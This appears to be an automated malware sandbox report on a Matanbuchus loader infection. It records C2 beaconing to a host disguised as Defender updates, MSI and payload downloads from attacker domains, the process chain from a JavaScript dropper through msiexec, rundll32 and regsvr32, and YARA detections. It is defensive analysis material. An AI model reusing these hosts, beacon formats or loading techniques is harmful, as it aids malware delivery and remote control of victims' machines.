                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:33.298293114 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:32 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.449912185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:33.562880039 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:35.027105093 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:34 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.449917185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:35.294671059 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:36.738509893 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:36 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.449922185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:36.998045921 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:41.590828896 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:38 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.449932185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:41.857400894 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:43.296139956 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:42 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.449939185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:43.558464050 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:45.104841948 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:44 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.4 | 49730 | 104.21.40.3 | 443 | 7164 | C:\Windows\System32\msiexec.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-06 21:19:36 UTC | 115 | OUT | GET /klog.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              User-Agent: Windows Installer
                                              Host: axizlhop.life
                                              2024-12-06 21:19:37 UTC | 802 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:19:37 GMT
                                              Content-Type: application/x-msi
                                              Content-Length: 978944
                                              Connection: close
                                              X-Powered-By: PHP/8.1.29
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BX8GxNTOjoegMhWHRlCnW2sl0Qmutt1qltoEF%2BT8ruiFRe7X4CRI5Q%2BY%2BwiCHnB5jZEm%2FfV1dugez%2BtExK2cMlyTcgglUD3oOCg0iYzRGAvPradM8eJIWqawX0SjrnJY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8edf50b10e2c4223-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1744&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=729&delivery_rate=1627647&cwnd=205&unsent_bytes=0&cid=55f72400780380a0&ts=566&x=0"


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.4 | 49731 | 185.234.216.175 | 443 | 1908 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-06 21:19:41 UTC | 125 | OUT | GET /AdminAccounts.aspx HTTP/1.1
                                              User-Agent: Microsoft-WNS/11.0
                                              Host: security-patches.systems
                                              Cache-Control: no-cache
                                              2024-12-06 21:19:42 UTC | 252 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:19:42 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              Last-Modified: Fri, 06 Dec 2024 08:34:45 GMT
                                              ETag: "4e000-62895e318030d"
                                              Accept-Ranges: bytes
                                              Content-Length: 319488
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.4 | 49732 | 185.234.216.175 | 443 | 1908 | C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-06 21:19:44 UTC | 117 | OUT | GET /verif.aspx HTTP/1.1
                                              User-Agent: Microsoft-WNS/11.0
                                              Host: security-patches.systems
                                              Cache-Control: no-cache
                                              2024-12-06 21:19:45 UTC | 252 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:19:45 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                              ETag: "d75c4-62796294faafa"
                                              Accept-Ranges: bytes
                                              Content-Length: 882116
                                              Connection: close
                                              Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
                                              2024-12-06 21:19:45 UTC16384INData Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55
                                              Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
                                              2024-12-06 21:19:46 UTC16384INData Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42
                                              Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449733185.234.216.1754434940C:\Windows\SysWOW64\regsvr32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-06 21:19:46 UTC | 117 | OUT | GET /verif.aspx HTTP/1.1
                                              User-Agent: Microsoft-WNS/11.0
                                              Host: security-patches.systems
                                              Cache-Control: no-cache
                                              2024-12-06 21:19:47 UTC | 252 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:19:47 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                              ETag: "d75c4-62796294faafa"
                                              Accept-Ranges: bytes
                                              Content-Length: 882116
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449780185.234.216.1754432500C:\Windows\SysWOW64\regsvr32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-06 21:20:44 UTC | 117 | OUT | GET /verif.aspx HTTP/1.1
                                              User-Agent: Microsoft-WNS/11.0
                                              Host: security-patches.systems
                                              Cache-Control: no-cache
                                              2024-12-06 21:20:45 UTC | 252 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:44 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                              ETag: "d75c4-62796294faafa"
                                              Accept-Ranges: bytes
                                              Content-Length: 882116
                                              Connection: close


                                              Target ID:0
                                              Start time:16:19:34
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js"
                                              Imagebase:0x7ff6c1a50000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:1
                                              Start time:16:19:34
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\msiexec.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                              Imagebase:0x7ff6839d0000
                                              File size:69'632 bytes
                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:2
                                              Start time:16:19:38
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding B05575DDF7F0D21FAECF0BEEF6387BEE
                                              Imagebase:0x450000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:16:19:38
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                                              Imagebase:0x7ff7e8070000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:4
                                              Start time:16:19:38
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                                              Imagebase:0xb90000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000004.00000002.2943950120.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:5
                                              Start time:16:19:43
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\regsvr32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x7ff634c10000
                                              File size:25'088 bytes
                                              MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:16:19:43
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                              Wow64 process (32bit):true
                                              Commandline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x90000
                                              File size:20'992 bytes
                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:16:19:59
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:16:20:42
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\regsvr32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x7ff634c10000
                                              File size:25'088 bytes
                                              MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:16:20:42
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                              Wow64 process (32bit):true
                                              Commandline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x90000
                                              File size:20'992 bytes
                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Has exited:true

                                              Target ID:13
                                              Start time:16:21:42
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\regsvr32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x7ff634c10000
                                              File size:25'088 bytes
                                              MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:14
                                              Start time:16:21:42
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                              Wow64 process (32bit):true
                                              Commandline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x90000
                                              File size:20'992 bytes
                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false


                                                Execution Graph

                                                Execution Coverage:9.1%
                                                Dynamic/Decrypted Code Coverage:97.8%
                                                Signature Coverage:41.8%
                                                Total number of Nodes:1532
                                                Total number of Limit Nodes:10
Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46274->46276 46277 7f2d8236 46275->46277 46278 7f2d835d 46276->46278 46280 7f2c20f0 std::ios_base::clear 11 API calls 46277->46280 46279 7f2c20f0 std::ios_base::clear 11 API calls 46278->46279 46279->46217 46281 7f2d8245 46280->46281 46282 7f2c20f0 std::ios_base::clear 11 API calls 46281->46282 46283 7f2d8254 46282->46283 46284 7f2c20f0 std::ios_base::clear 11 API calls 46283->46284 46285 7f2d8260 46284->46285 46286 7f2c20f0 std::ios_base::clear 11 API calls 46285->46286 46287 7f2d826c 46286->46287 46288 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46287->46288 46289 7f2d8278 46288->46289 46290 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46289->46290 46291 7f2d8285 46290->46291 46292 7f2c20f0 std::ios_base::clear 11 API calls 46291->46292 46292->46217 46294 7f293160 56 API calls 46293->46294 46295 7f294507 46294->46295 46296 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46295->46296 46297 7f29453f 46296->46297 46298 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46297->46298 46299 7f29454c 46298->46299 46299->45843 46301 7f2a683a 46300->46301 46301->46301 46302 7f295360 numpunct 26 API calls 46301->46302 46303 7f2a6871 46302->46303 46303->45843 46305 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46304->46305 46306 7f2a9d71 46305->46306 46307 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46306->46307 46308 7f2a9df3 46307->46308 46309 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46308->46309 46310 7f2a9e01 46309->46310 46311 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46310->46311 46312 7f2a9e0e GetPEB 46311->46312 46312->45843 46313->45843 
